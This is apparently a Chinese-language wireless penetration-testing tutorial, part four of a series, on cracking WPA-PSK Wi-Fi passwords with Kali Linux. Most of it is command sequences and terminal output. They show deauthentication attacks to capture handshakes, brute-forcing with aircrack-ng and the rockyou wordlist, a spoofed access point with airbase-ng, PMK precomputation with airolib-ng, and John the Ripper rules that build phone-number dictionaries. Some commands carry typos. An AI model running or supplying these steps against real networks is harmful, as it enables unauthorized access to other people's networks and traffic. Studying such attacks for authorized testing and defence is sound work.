无线渗透（四）WPA攻击

WPA PSK攻击

只有一种密码破解方法

WPA不存在WEP的弱点

只能暴力破解

CPU资源

时间

字典质量

网上共享的字典

泄露密码

地区电话号码段

Crunch生成字典

kali中自带的字典文件

WPA PSK攻击

PSK破解过程

开始抓包并保存

Deauthentication攻击获取4步握手信息

使用字典暴力破解

root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill

Killing these processes:

FID NAME

989 wpa_supplicant

1025 dhclient

root@kali:~# airmon-ng start wlan0

NO interfering processes found

PHY Interface Driver Chipest

phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n

(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)

(mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# iwconfig

eth0 no wireless extensions

wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm

Retry short limit:7 RTS thr:off Fragment thr:off

Power Management:off

lo no wireless extensions.

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon –bssid D4:EE:07:67:22:90 -c 11 -w wpa

root@kali:~# aireplay-ng -0 2 -a D4:EE:07:67:22:90 -c A4:50:46:E0:FA:06 wlan0mon

root@kali:~# ls

wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml

root@kali:~# ls wpa*

wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml

root@kali:~# cd /usr/share/john/ 字典目录

root@kali:/usr/share/john# ls password.list

root@kali:/usr/share/john# more password.list

root@kali:/usr/share/john# grep Password password.list

Password

root@kali:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap

密码是Password

root@kali:~# cd /usr/share/wfuzz/wordlist/

fuzzdb/ general/ Injections/ others/ stress/ vulns/ webservicces/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/

attack-playloads/ dbcs/ web-backdoors/ wordlists-user-passwd/

Discovery/ regex/ wordlists-misc/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-

wordlists-misc/ wordlists-user-passwd/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls

common-http-ports.txt us_cities.txt wordlist-alpharumeric-case.txt wordlist-common-snmp-community-strings.txt wordlist-dns.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls

john.txt phpbb.txt twltter.txt woksauce.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:~# cd /usr/share/

root@kali:/usr/share# ls

root@kali:/usr/share# cd wordlists/

root@kali:/usr/share/wordlists# ls

dirb dirbuster dnsmap.txt Fasttrack.txt fern-wifi metasploit metasploit-jtr namp.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l

-rw-r–r– 1 root root 53357341 3月 3 2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l -h

-rw-r–r– 1 root root 51M 3月 3 2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls

dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt sqlmap.txt terminter.txt wfuzz

root@kali:/usr/share/wordlists# cat rockyou.txt | wc -l

14344392

root@kali:/usr/share/wordlists#

aircrack-ng -w rockyou.txt /root/wpa-01.cap

密码是password

root@kali:~# airodump-ng –essid kifi wlan0mon

root@kali:~# airodump-ng –bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa

root@kali:~# ls

wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

root@kali:~# grep Password135 /usr/share/wordlists/rockyou.txt

WPA PSK攻击

无AP情况下的WPA密码破解

启动monitor

开始抓包并保存

根据probe信息伪造相同ESSID的AP

抓取四步握手中的前两个包

使用字典暴力破解

（E + PSK）经过4096次hash计算 = PMK

root@kali:~# airodump-ng wlan0mon

root@kali:~# rm wpa-01.*

root@kali:~# airodump-ng wlan0man

root@kali:~# airbase-ng -h

sage: airbase-ng <options> <replay interface>

Options

-a bssid : set Access Point MAC address

-i iface : capture packets from this interface

-w WEP key : use this WEP key to encrypt/decrypt packets

-h MAC : source mac for MITM mode

-f disallow : disallow specified client MACs (default: allow)

-W 0|1 : [don’t] set WEP flag in beacons 0|1 (default: auto)

-q : quiet (do not print statistics)

-v : verbose (print more messages) (long –verbose)

-M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)

-A : Ad-Hoc Mode (allows other clients to peer) (long –ad-hoc)

-Y in|out|both : external packet processing

-c channel : sets the channel the AP is running on

-X : hidden ESSID (long –hidden)

-s : force shared key authentication

-S : set shared key challenge length (default: 128)

-L : Caffe-Latte attack (long –caffe-latte)

-N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)

-x nbpps : number of packets per second (default: 100)

-y : disables responses to broadcast probes

-0 : set all WPA,WEP,open tags. can’t be used with -z & -Z

-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104

-Z type : same as -z, but for WPA2

-V type : fake EAPOL 1=MD5 2=SHA1 3=auto

-F prefix : write all sent and received frames into pcap file

-P : respond to all probes, even when specifying ESSIDs

-I interval : sets the beacon interval value in ms

-C seconds : enables beaconing of probed ESSID values (requires -P)

Filter options:

–bssid <MAC> : BSSID to filter/use (short -b)

–bssids <file> : read a list of BSSIDs out of that file (short -B)

–client <MAC> : MAC of client to accept (short -d)

–clients <file> : read a list of MACs out of that file (short -D)

–essid <ESSID> : specify a single ESSID (short -e)

–essids <file> : read a list of ESSIDs out of that file (short -E)

Help:

–help: Displays the usage screen (short -H)

# airbase-ng 使用笔记本的无线网卡伪造AP

root@kali:~# airbase-ng –essid lcon -c 11 wlan0mon //伪装AP

18:44:04 Created tap interface at0

18:44:04 Trying to set MTU on at0 to 1500

18:44:04 Trying to set MTU on wlan0mon to 1800

18:44:04 Access point with DSSID C8:3A:35:CA:46:91 started.

root@kali:~# tnux //分屏

root@kali:~# airbase –essid kifi -c 11 wlan0mon

# -z WPA1

root@kali:~# airbase –essid kifi -c 11 -z 2 wlan0mon

# -Z WPA2

root@kali:~# airbase –essid kifi -c 11 -Z 4 wlan0mon

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon –essid kifi

root@kali:~# airodump-ng wlan0mon –essid kifi -w wpa

root@kali:~# airodump-ng wlan0mon –essid kifi -w wpa -c 11

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0

wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

AIROLIB破解密码

设计用于存储ESSID和密码列表

计算生成不变的PMK（计算资源消耗型）

PMK在破解阶段被用于计算PTK（速度快，计算资源要求少）

通过完整性摘要值破解密码

SQLlite3数据库存储数据

AIROLIB破解密码

echo kifi > essid.txt

# 创建数据库

airolib-ng db –import essid essid.txt

# 查看当前数据库状态

airolib-ng db –stats

# 导入密码文件

airolib-ng db –import passwd <wordlist>

自动剔除不合格的WPA字典

# 批处理

airolib-ng db –batch

生成PMK

aircrack-ng -r db wpa.cap

root@kali:~# echo kifi > essid.txt

root@kali:~# cat essid.txt

kifi

root@kali:~# airolib-ng db –import essid essid.txt

root@kali:~# airolib-ng db –stats

There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID Priority Done

kifi 64 (null)

root@kali:~# airolib-ng db –import passwd /usr/share/wordlists/rockyou.txt

root@kali:~# airolib-ng db –import passwd /usr/share/john/passwrod.lst

root@kali:~# airolib-ng db –stats

There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID Priority Done

kifi 64 0.0

root@kali:~# airolib-ng –batch

Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.

root@kali:~# aircrack-ng -r db wpa-02.cap

Opening wpa-02.cap

Read 9258 packets

# BSSID ESSID Encryption

1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap

Reading packetsm, please wait…

Aircack-ng 1.2 rc2

root@kali:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt

root@kali:~# more dict.txt

root@kali:~# airolib-ng db –import password dict.txt

Reading file

Writing…as read,121538 invalid lines ignored.

Done

root@kali:~# airolib-ng db –batch

JTR破解密码

John the ripper

快速的密码破解软件

支持基于规则扩展密码字典

很多人系统用手机号码做无线密码

获取号段并利用JTR规则增加最后几位的数字

配置文件/etc/john/john.conf

[list.Rules:Wordlist]

$[0-9]$[0-9]$[0-9]

root@kali:~# gedit

root@kali:~# top //系统的性能

root@kali:~# aircrack-ng -r db wpa-02.cap

Opening wpa-02.cap

Read 9258 packets

# BSSID ESSID Encryption

1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap

Reading packetsm, please wait…

Aircack-ng 1.2 rc2

root@kali:~# cat yd.txt

root@kali:~# vim /etc/john/john.conf

/list.Rules:Wordlist

在最后加上密码规则

$[0-9]$[0-9]$[0-9]

JTR破解密码

测试效果

john –wordlist=passwrod.list –rules –stdout | grep -i Password123

破解调用

john –wroldlist=pass.list –rules –stdout | aricrack-ng -e kifi -w – wap.cap

北京联通手机号密码破解

root@kali:~# john –wordlist=yd.txt –rules –stdout

root@kali:~# ls yd.txt -lh

-rw-r–r– 1 root root 561 11月 10 19:57 yd.txt

root@kali:~# john –wroldlist=yd.txt –rules –stdout | aricrack-ng -e kifi -w – wap02.cap